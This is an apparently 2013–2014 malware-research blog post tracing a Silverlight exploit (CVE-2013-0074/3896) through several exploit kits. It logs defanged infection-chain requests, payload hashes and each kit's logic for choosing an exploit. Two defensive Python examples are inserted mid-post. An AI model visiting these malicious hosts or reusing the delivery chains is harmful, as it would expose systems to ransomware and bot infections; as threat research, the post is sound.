2013-11-13 - Exploit Integration

CVE-2013-0074/3896 (Silverlight) integrated into Exploit Kits

Angler EK is definitely on the move. That is not a huge surprise if, as we can speculate, the team behind it is the same one that was first using Cool EK (as Paunch's VIP customer) and is behind the Reveton threat.

After integrating CVE-2013-0634 (Flash) last week,

EKWatcher has spotted a new change today: the Silverlight check has now been activated and delivers an exploit.
Pedro Marinho from Emerging Threats pointed out the link with Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure.

(Right now I don't understand why CVE-2013-3896 is mentioned here. Will update if I learn about it.)
<edit: 2013-11-26> So CVE-2013-3896 is used to bypass ASLR (cf. the post from Yuki Chen - TrendMicro).</edit>

CVE-2013-0074/3896 pass in Angler EK :

CVE-2013-0074 successful pass in Angler EK

Silverlight 5.1.10411.0 add-on in IE used in that pass

Note: I made a pass with Silverlight 5.1.20513.0; as the fire condition told us: safe.

GET http://peragretisque.yevgenimalkin .com/leoccvkead
200 OK (text/html)

Silverlight version checks
Angler EK 2013-11-13

Deciding if Silverlight must be fired : "sterlings"
in Angler - 2013-11-13

Call for Silverlight Exploit in Angler 2013-11-13
GET http://peragretisque.yevgenimalkin .com/0leoccvkeadmnp
200 OK (text/html)

Silverlight Call
Content of that zip
Dll TimeStamp

The DLL (5f36a4c019d559f1be9fdd0cd770be2e) would be worth some work, but as is often the case I do not have the knowledge right now to provide useful data. I will link any analysis that comes out.

GET http://peragretisque.yevgenimalkin .com/1leoccvkeadmnp
200 OK (application/octet-stream) XORed Reveton ransomware.
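The payload above is only described as "XORed"; the post does not say how. As an added example (not code from the post, Angler or Reveton), here is the check a practitioner runs on such a blob: assume a single repeating key byte (the common exploit-kit case, an assumption here), derive it from the known `MZ` header and confirm the guess by finding `PE\0\0` at `e_lfanew`. The PE-shaped buffer is constructed inline, not the real sample.

```python
"""Recover a single-byte-XOR encoded PE payload.

Added example, not code from the post. A one-byte repeating key is an
assumption (the post only says the Reveton payload was XORed). The key
is derived from the known 'MZ' signature and confirmed by locating the
'PE\\0\\0' signature through e_lfanew, so a wrong guess is rejected.
"""
import struct


def xor_bytes(data, key):
    """XOR every byte of `data` with the single key byte `key`."""
    return bytes(b ^ key for b in data)


def looks_like_pe(data):
    """True if `data` has an MZ header whose e_lfanew points at 'PE\\0\\0'."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        return False
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if not 0x40 <= e_lfanew <= len(data) - 4:
        return False
    return data[e_lfanew:e_lfanew + 4] == b"PE\x00\x00"


def recover_xor_pe(blob):
    """Return (key, decoded) for a single-byte XORed PE, else (None, None)."""
    if len(blob) < 0x44:
        return None, None
    key = blob[0] ^ ord("M")            # known plaintext: first byte is 'M'
    if blob[1] ^ key != ord("Z"):       # second byte must then decode to 'Z'
        return None, None
    decoded = xor_bytes(blob, key)
    if not looks_like_pe(decoded):      # reject a lucky 'MZ' with no PE header
        return None, None
    return key, decoded


def make_fake_pe():
    """Constructed minimal PE-shaped buffer for the demo (not a real executable)."""
    hdr = bytearray(b"MZ" + b"\x00" * 0x3E)      # 0x40-byte DOS header
    struct.pack_into("<I", hdr, 0x3C, 0x80)       # e_lfanew -> 0x80
    return bytes(hdr) + b"\x00" * (0x80 - len(hdr)) + b"PE\x00\x00" + b"\x00" * 0x5C


if __name__ == "__main__":
    plain = make_fake_pe()
    wire = xor_bytes(plain, 0x5A)                 # what the kit would serve
    key, out = recover_xor_pe(wire)
    print("key:", hex(key), "restored:", out == plain)
```

Run it on the raw `application/octet-stream` body: a `(None, None)` result means the encoding is not a single-byte XOR (or the blob is not a PE at all), which is the cue to look for a longer key or a different scheme rather than trusting the first `MZ` that appears.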

One of the US Reveton Design
Firefox ?
 Silverlight 5.1.10411.0 Addon In Firefox 17
Interaction is required :
Firefox Warning on Silverlight call from Angler EK
If you click... Boom...
Silverlight 5.1.10411.0 - Firefox 17
Angler EK 2013-11-13
<edit 2013-11-19>

Files :
Here is a Pcap
(Courtesy of Will Metcalf from Emerging Threats).
Here is a Fiddler

Styx Kein : (2013-11-19)
I have been told it was there (thanks!)

CVE-2013-0074 positive pass in Styx Kein 2013-11-19
(payload taken from Angler EK...or more likely from here :/ )
GET http://www3.3b812bc6.kjyg .com/?7u4s=W%2BWd13CVXqabxqBnaKdrqlnOq25flomqq%2BFx1WTGbmFilZVub6VY
302 Moved Temporarily to http://www1.gh1pn3avb63m2.4pu.com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW

GET http://www1.gh1pn3avb63m2.4pu .com/i.html?591w0k=WbOj25TcpOKa4tWm1pzXn5eqY2ZraK5W29DMbqOUlMPY1HOFwX1bpaS0YZuXoFff4XDY7JlcldaWcpuQwHWcl46b1tSs07PQnKbhpp1flNptr6yOmuCrapmklmxhnmZuZ2asVt7byaXl4XCSnNmfl6pjZmxonaTf06WTodJpkaaVaGulYlutpLRhnp%2BcaainbJKtiJqi2pOep27up%2BKalmTSpmST2MVsYdicrqBf2p%2FYjcmi2uSqnurToanaWKeel7SY39vYVqOvWJO8h2h50KiaZmOnYZ6UmGGnomHG7tJbZbNW
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/nnnnvdd.html
200 OK (text/html)

Once decoded:
This is the Java detection that chooses which CVE to fire based on your version.
It should be: jorg.html is CVE-2013-0431 or CVE-2013-0422,
jvvn.html is CVE-2013-2465,
jply.html could be CVE-2013-2472 + Click-to-Play bypass if it is the same as in Styx.
If Java does not fire... then let's check PDF!

GET http://www1.gh1pn3avb63m2.4pu .com/pdfx.html
200 OK (text/html)

GET http://www1.gh1pn3avb63m2.4pu .com/qopne.html
200 OK (text/html)

Once decoded:
We can see the conditions to fire CVE-2011-3402 (fnts.html),
then some checks to fire CVE-2010-0188 (PDF),
and depending on the PDF conditions, two bullets are fired:
CVE-2013-2551 (iexp.html) and CVE-2013-0074 (Silverlight).

GET http://www1.gh1pn3avb63m2.4pu .com/iexp.html
200 OK (text/html) Call for CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/retn.html
200 OK (text/html) Call for the call for CVE-2013-0074 (retn.html calls s.html, which calls the exploit)

Call for s.html

GET http://www1.gh1pn3avb63m2.4pu .com/hdht.html
200 OK (text/html) CVE-2013-2551

GET http://www1.gh1pn3avb63m2.4pu .com/s.html
200 OK (text/html)

Call for Silverlight Exploit
(and preparation of the variables passed to the exploit; note xlkey = 1)

GET http://www1.gh1pn3avb63m2.4pu .com/zip.eot
200 OK (application/vnd.ms-fontobject) cb9f864eb3b63172d01f9f45d849cc15

Contains :
Content of the Silverlight Call
Ripped from Angler EK (or more likely from this blog... :/ )
5f36a4c019d559f1be9fdd0cd770be2e :) the exact same DLL as in Angler EK. They didn't even try to rebuild their exploit from source.

GET http://www1.gh1pn3avb63m2.4pu .com/1a8aqgdg7qedig.eot
200 OK (application/vnd.ms-fontobject) (note the 14-character Angler-ish pattern :) ) dc7647bc7896912b0fea4b93815e7fd0
This is the actual payload of the exploit. It is in fact a loader that grabs the real objective: Simda.

GET http://www2.h-qo05lqa59ljh7.wpbh .org/?aptlxbvy=hdPh0LXH7t6OotrTbWado5hsX%2BDe1HTDodiiqJKpq6BloZWkqKmilG1tpKKhcJKnmtjrn6epmGWX0JKX3q6ziYSS2tGbnqOa35w%3D&h=71
200 OK (application/octet-stream)   77cafd814d93ed7154676744fcf7ae75 Simda (Podmena Affiliate payload)

Want to know more about Styx Kein ? Read Inside a (The?) Simda Affiliate : Партнёрка Podmena (formerly Chesto) 2013-11-12

Files: Payload, decoded js and Fiddler (Owncloud via goo.gl)

FlashPack : 2013-12-06 (child of SafePack/CritXPack/Vintage Pack)
As spotted by Eoin Miller, the Silverlight exploit is now in FlashPack.
(I will only fly over it.)

CVE-2013-0074/3896 Successful pass in FlashPack

GET http://besexeweryopko .com/cosmik/hkmh90B4.php
200 OK (text/html)

GET http://besexeweryopko .com/cosmik/capuro/da7c6b38522017d83733eac7775c7dbe.js
200 OK (application/javascript)

GET http://besexeweryopko .com/cosmik/silver.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html)

Here, id converted from hex to text gives you: 10.1.0.0|0.0.0.0|11.6.602.180|5.1.10411.0|Windows 7|MSIE 10

which are respectively:
the Adobe Reader, Java, Flash, Silverlight, OS and browser versions (0.0.0.0 presumably meaning Java was not detected)


GET http://besexeweryopko .com/cosmik/msie.php?id=31302e312e302e307c302e302e302e307c31312e362e3630322e3138307c352e312e31303431312e307c57696e646f777320377c4d534945203130
200 OK (text/html) <- CVE-2013-2551

GET http://besexeweryopko .com/cosmik/capuro/def6f322082144f16a8450c1d0051eeb.eot
200 OK (text/plain)

Content of the "eot"
fotomaster-cleaner.dll : 5faca70a46982cb945cd8e4b3a544aa8
TimeStamp : 2013-12-04 16:35:38

GET http://besexeweryopko .com/cosmik/capuro/fa6030784e2d535687f8c94b210dfb65.eot
200 OK (text/plain)

2nd "eot" (seems to contain parameters).

GET http://besexeweryopko .com/cosmik/loadsilver.php
200 OK (application/octet-stream)  b61b986194de5fef36d805923a0f9379 (Zaccess)

Fiddler : Here

Fiesta : 2014-01-03 (integration around 2013-12-28)
Thanks Nathan Fowler for Referer!
As spotted yesterday by Will Metcalf from Emerging Threats

CVE-2013-0074/3896 successful pass in Fiesta
GET http://img.hitres .in/uiwtv07/counter.php?id=2
301 Moved Permanently to http://img.hitres.in/uiwtv07/?2 (note: you won't see this pattern in all Fiesta passes)

GET http://img.hitres .in/uiwtv07/?2
200 OK (text/html)

GET http://img.hitres .in/uiwtv07/?25ea404b5396cf485b50095a060b065102015c500f045652090057020200065406
200 OK (text/html) CVE-2013-2551 attempt

GET http://img.hitres .in/uiwtv07/?6ec285af089912d6450915090a0e535506515a03030103560d5051510e05535002;5110411
200 OK (application/x-silverlight-app) (Note the Silverlight Version in the call) ce056895e07d2a9d04c5e8db844013ea

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6
200 OK (application/octet-stream) bdcfe33dbc7f86b929ddfbfa7a4ce43d, which is Miuref.A (MS name), dropping: 71af22a63b970e0ec14e17497a33ba43 Miuref. (If anyone has worked on it, I'd love to know what this stuff is about, as it is becoming widespread.)

GET http://img.hitres .in/uiwtv07/?3c05f5cc5aaf070d561b550e540e5150035709045d010153085602565005515507;1;6;1
200 OK (text/html)

Files : Fiddler, Payloads

Goon/Redkit2:  ~2014-01-22

Pcap of the infection  provided by Will Metcalf. Thanks !

Successful path in Goon on 2014-01-22
Then Kelihos Spambot loading Simda and Kelihos bot

GET http://disabilitybenefitsinsider .com/home/au/link/xmlupdater.html
200 OK (text/html)

end of CVE-2013-2551 and Silverlight call
Base64 decoded to:

Shellcode as Parameter

GET http://disabilitybenefitsinsider .com/FFE.xap
200 OK (application/x-silverlight-app)  167a0ffcfb6d828f5090b58d0b3c6b30

Xap contains
Silverlight.dll : 83b0c1ff586044dbc6c0b99c55e27534
Nicely handled by dotPeek:
Silverlight.dll in dotPeek.
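Across the kits above the XAP travels under whatever name and type slips past filters: Styx serves it as zip.eot with application/vnd.ms-fontobject, FlashPack as an .eot with text/plain, Fiesta and Himan as an application/x-silverlight-app or a plain 1.zip, and Goon as FFE.xap with the proper type. Since a XAP is just a ZIP holding AppManifest.xaml and the assembly, the practical check is "is this body a ZIP, does the declared type admit that, and which DLLs are inside". The following is an added example, not code from the post or from the Emerging Threats script it links; the response bodies are constructed in memory and are not the real files.

```python
"""Flag HTTP responses that carry a Silverlight XAP (a ZIP) under a
mismatched content type, and list the assemblies inside.

Added example, not code from the post or any cited tool. Sample bodies
are constructed here; only the URLs and content types mirror the post.
"""
import hashlib
import io
import zipfile

ZIP_MAGIC = b"PK\x03\x04"

# Declared types under which a ZIP/XAP body is not by itself suspicious.
XAP_TYPES = {"application/x-silverlight-app", "application/x-silverlight", "application/zip"}


def inspect_response(url, content_type, body):
    """Describe whether `body` is a ZIP/XAP and what it contains."""
    is_zip = body.startswith(ZIP_MAGIC)
    declared = content_type.split(";")[0].strip().lower()
    result = {
        "url": url,
        "content_type": declared,
        "md5": hashlib.md5(body).hexdigest(),   # for cross-kit reuse checks
        "is_zip": is_zip,
        "type_mismatch": is_zip and declared not in XAP_TYPES,
        "has_manifest": False,
        "dlls": [],
    }
    if not is_zip:
        return result
    try:
        with zipfile.ZipFile(io.BytesIO(body)) as zf:
            names = zf.namelist()
    except zipfile.BadZipFile:           # PK magic but a corrupt archive
        return result
    result["has_manifest"] = any(n.lower() == "appmanifest.xaml" for n in names)
    result["dlls"] = [n for n in names if n.lower().endswith(".dll")]
    return result


def build_xap(dll_name):
    """Constructed stand-in for a XAP: a manifest plus a dummy assembly."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AppManifest.xaml", "<Deployment/>")
        zf.writestr(dll_name, b"MZ" + b"\x00" * 64)  # not a real PE
    return buf.getvalue()


# Constructed samples mirroring the post's observations (hosts defanged as in the post).
SAMPLES = [
    ("http://www1.gh1pn3avb63m2.4pu .com/zip.eot",
     "application/vnd.ms-fontobject", build_xap("Silverlight.dll")),
    ("http://besexeweryopko .com/cosmik/capuro/def6f322082144f16a8450c1d0051eeb.eot",
     "text/plain", build_xap("fotomaster-cleaner.dll")),
    ("http://disabilitybenefitsinsider .com/FFE.xap",
     "application/x-silverlight-app", build_xap("Silverlight.dll")),
    ("http://example.invalid/genuine.eot",            # non-ZIP body standing in for a real font
     "application/vnd.ms-fontobject", b"\x00\x01\x02" + b"\x00" * 40),
]


def scan(samples=SAMPLES):
    """Inspect every (url, content_type, body) triple and return the findings."""
    return [inspect_response(url, ctype, body) for url, ctype, body in samples]


if __name__ == "__main__":
    for r in scan():
        flag = "SUSPECT" if r["type_mismatch"] else "ok"
        print(f"{flag:8} {r['content_type']:32} dlls={r['dlls']} {r['url']}")
```

Feed it `(url, Content-Type, body)` triples pulled from a pcap or Fiddler session; the md5 field is what lets you notice that Fiesta and Himan served the exact same archive, and the DLL list is where the exploit assembly to hand to dotPeek shows up.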

GET http://disabilitybenefitsinsider .com/68283080.mp3
200 OK (application/x-msdownload)

Himan: 2014-01-23 (quite surely earlier; this is the date it was spotted)

Silverlight CVE-2013-0074/3896 positive path in Himan
GET http://jvdsdveee .pw/tevyhyme.php
200 OK (text/html)

GET http://jvdsdveee .pw/po/yt.js
200 OK (application/x-javascript)

POST http://jvdsdveee .pw/index.php
200 OK (text/html)

GET http://jvdsdveee .pw/resirypenxuvore/xie.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-2551

GET http://jvdsdveee .pw/resirypenxuvore/fla.php?wq=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) <- CVE-2013-0634

GET http://jvdsdveee .pw/resirypenxuvore/xe.php?gf=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (text/html) Silverlight Exploit Call

Silverlight Exploit call in HiMan 2014-01-23

I didn't try to decode it.

GET http://jvdsdveee .pw/resirypenxuvore/d.php?hgfc=687474703a2f2f6a76647364766565652e70772f72657369727970656e7875766f72652f646176727774687772687676762e7068703f6e3d37343738
200 OK (application/pdf)

GET http://jvdsdveee .pw/resirypenxuvore/1.zip
200 OK (application/zip) ce056895e07d2a9d04c5e8db844013ea cf. Fiesta: the exact same sample.

GET http://jvdsdveee .pw/resirypenxuvore/tx.exe
200 OK (application/octet-stream) (Ransomware 7043831f829fd8305a59cc6df09cc8b6 )

GET http://jvdsdveee .pw/resirypenxuvore/b.jar
200 OK (application/java-archive)

Nuclear Pack :    2014-09-12

Spotted by Brad

Post Publication Reading:
A Look At A Silverlight Exploit - Yuki Chen - TrendMicro, 2013-11-25

Read More:
Packet Storm Exploit 2013-1022-1 - Microsoft Silverlight Invalid Typecast / Memory Disclosure, authored by Vitaliy Toropov
CVE-2013-0074 - NIST
Lua script by Emerging Threats to detect the exploitation in Suricata (can also be run from the command line)